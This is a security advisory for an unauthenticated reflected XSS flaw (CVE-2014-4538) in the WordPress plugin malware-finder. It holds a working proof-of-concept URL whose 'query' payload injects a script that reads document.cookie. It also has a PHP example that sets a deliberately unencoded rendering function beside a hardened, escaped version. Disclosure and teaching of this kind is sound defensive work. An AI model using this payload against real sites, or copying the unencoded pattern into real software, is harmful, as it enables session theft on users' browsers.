wp-plugin : malware-finder – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : malware-finder

Affected Version : 1.1 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC (Proof of Concept) :
http://localhost/wordpress/wp-content/wp-plugs/malwarefinder/process.php?query=query%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : query

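The PoC works because the `query` value is reflected into the page without output encoding; the leading `'>` in the payload indicates a single-quoted HTML attribute context. The block below is an added, hypothetical reconstruction of that pattern beside a hardened version. It is not the plugin's own code; the function names, the `value='...'` context and the nonce action name are assumptions.

```php
<?php
// Added example (not the plugin's code). Reconstructs the reflected-attribute
// pattern behind the PoC and shows the hardened equivalent. All names are
// assumptions; only the `query` parameter and process.php come from the advisory.

// VULNERABLE: the raw GET value is interpolated into a single-quoted attribute.
// A value beginning with  '>  closes the attribute and the tag, so any markup
// that follows (such as a <script> element) is rendered by the browser.
function render_vulnerable($query) {
    return "<input type='text' name='query' value='" . $query . "'>";
}

// HARDENED: encode for the HTML attribute context. ENT_QUOTES covers both
// ' and " in addition to < > &, so the payload remains inert attribute text.
function render_hardened($query) {
    $safe = htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='text' name='query' value='" . $safe . "'>";
}

// Inside WordPress the same encoding is esc_attr(). Because process.php was
// reachable without authentication, the handler also needs an authorization
// gate and a nonce before it does any work (hypothetical action name).
function handle_request() {
    if (!function_exists('current_user_can') || !current_user_can('manage_options')) {
        http_response_code(403);
        return 'Forbidden';
    }
    check_admin_referer('malwarefinder_search');   // rejects forged requests
    $q = isset($_GET['query']) ? (string) $_GET['query'] : '';
    return "<input type='text' name='query' value='" . esc_attr($q) . "'>";
}

// Demo with the payload from the PoC (constructed input, URL-decoded).
$poc = "query'><script>alert(document.cookie)</script>";
echo render_vulnerable($poc), "\n";   // attribute is broken out of
echo render_hardened($poc), "\n";     // quotes and angle brackets are encoded
```

Run with `php example.php` to compare the two renderings; only the first one contains a live `<script>` element when loaded in a browser.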
Disclosure Timeline

Vendor Contacted : 2014-01-21

Plugin Status : Closed

Public Disclosure : May 28, 2014

CVE Number : CVE-2014-4538

Plugin Description :

Malware is a huge challenge in managing a WordPress blog, not to mention that it can take hours to find where malicious code is hiding. But most likely you have access to at least one file (i.e. your homepage) that has been infected with malicious code. Just paste a small piece of that code below and the plugin will search through your entire WordPress installation, providing the EXACT locations of the infected files! Please note that you WILL NOT be able to use this plugin if you are UNABLE to access your WordPress Dashboard.
